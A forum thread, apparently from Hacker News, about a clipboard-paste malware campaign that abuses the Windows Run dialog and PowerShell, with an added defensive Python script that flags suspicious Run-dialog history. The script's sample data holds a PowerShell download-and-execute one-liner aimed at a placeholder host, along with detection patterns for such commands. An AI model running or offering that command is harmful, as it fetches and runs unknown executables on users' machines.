AshamedCaptain 12 hours ago

I do not understand how this works. I thought the default PS policy on all versions of Windows was not to run "unsigned" PS scripts by default (precisely for this reason). Or at least I've personally seen that a myriad of times.

So, are these malware scripts signed, has MS relaxed the default PS policy, do users relax it, or has this malware found another way around it?

  • antonyt 12 hours ago

    The attack has the user paste content into the Windows run dialog. That could include spawning an admin PowerShell and running `Set-ExecutionPolicy -ExecutionPolicy Unrestricted` before running a remote script. Or more likely what nullindividual said - the download and start of the exe is entirely contained in what the user is pasting in.

  • nullindividual 12 hours ago

    It's not a script, which would be a .ps1 file, but from the sounds of it the actual script block/PowerShell function which isn't governed by the signing policy. It could simply be an Invoke-WebRequest to download that executable indicated in the article.
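As an added example (not code from the thread or from anyone quoted in it), a small Python triage that reads a snapshot of the Run-dialog history and flags the pattern nullindividual and antonyt describe: a PowerShell launch combined on one pasted line with an execution-policy override, a remote download and a start of the fetched executable. The RunMRU key layout is real Windows behaviour; the history entries, the example.invalid host and the indicator list are constructed for this example.

```python
"""Triage a Windows Run-dialog history snapshot for pasted PowerShell one-liners.

The Run dialog stores its history in the registry key
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU: each
single-letter value holds "<command>\\1" and MRUList gives most-recent-first order.
"""
import re
from typing import Dict, List

# Constructed snapshot of the RunMRU key (not taken from a real machine).
SAMPLE_RUNMRU: Dict[str, str] = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "powershell Get-Date\\1",
    "d": ('powershell -ExecutionPolicy Unrestricted -c "iwr http://example.invalid/x.exe '
          '-OutFile $env:TEMP\\x.exe; Start-Process $env:TEMP\\x.exe"\\1'),
}

# No single pattern is malicious on its own; the combination on one pasted line is.
INDICATORS = {
    "powershell-launch": re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I),
    "policy-override": re.compile(r"-(ep|ex|executionpolicy)\s+(bypass|unrestricted)|set-executionpolicy", re.I),
    "remote-fetch": re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile)\b", re.I),
    "inline-exec": re.compile(r"\b(iex|invoke-expression|start-process|saps)\b", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded-command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

def run_history(runmru: Dict[str, str]) -> List[str]:
    """Return the Run-dialog commands most-recent first, without the trailing '\\1'."""
    commands = []
    for letter in runmru.get("MRUList", ""):
        raw = runmru.get(letter)
        if raw is not None:
            commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands

def indicators_for(command: str) -> List[str]:
    """Names of the indicator patterns that match a single command line."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(command)]

def triage(runmru: Dict[str, str], min_hits: int = 3) -> List[dict]:
    """Flag entries that launch PowerShell and carry at least min_hits indicators in total."""
    findings = []
    for command in run_history(runmru):
        hits = indicators_for(command)
        if "powershell-launch" in hits and len(hits) >= min_hits:
            findings.append({"command": command, "indicators": hits})
    return findings
```

A plain `powershell Get-Date` entry trips only the launch indicator and is not flagged, which is the point of requiring the combination rather than the presence of PowerShell itself.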

mimi89999 10 hours ago

Shouldn’t Windows just show a huge warning explaining the implications of such actions when a user who has never used the Windows Run function nor PowerShell suddenly attempts to run some suspicious code pasted from the clipboard?

  • nullindividual 9 hours ago

    What would you define as 'suspicious'? How would you distinguish suspicious from not suspicious?

    • eviks 4 hours ago

      Frequency, network use, running unknown executables

mrguyorama 12 hours ago

Why can a website silently add stuff to my clipboard anyway? Firefox and Safari require "transient activation" to enable clipboard actions, which apparently only means you clicked your mouse (anywhere) or made a keystroke. What a brilliant security/permission strategy for such an important function, which can do things like expose your password, modify copied links, shuttle information across web page security and isolation boundaries, etc.

Chrome at least requires a prompt for reading clipboard contents, which is apparently "diverting from the specifications"!

Who came up with this? Why is every feature in web browsers and JavaScript built in the dumbest way possible? At least in Win32 when it says "you should only touch the clipboard on request from the user" they have the excuse that it was 1995 and there was very little information to muck with or steal on the average computer! Even then they still worked towards hardening the functionality.

Web browsers implemented this in 2018!

  • duskwuff 11 hours ago

    > Why can a website silently add stuff to my clipboard anyway?

    It's copying content to the clipboard after the user clicks the "I'm not a robot" button. This is indistinguishable from the user clicking a "copy to clipboard" button on a web page, or clicking through an "edit > copy" menu - the only difference is user intent.

  • LorenPechtel 11 hours ago

    There was a click in the sequence. More of an issue I think is that it sounds like this executes immediately. If so I think the proper fix is to preclude PowerShell from accepting any form of execution from the clipboard--you can paste in the command but the user must execute it.

    • nullindividual 9 hours ago

      The user is executing the script. They're pasting it in and hitting 'run' in the run dialog box.
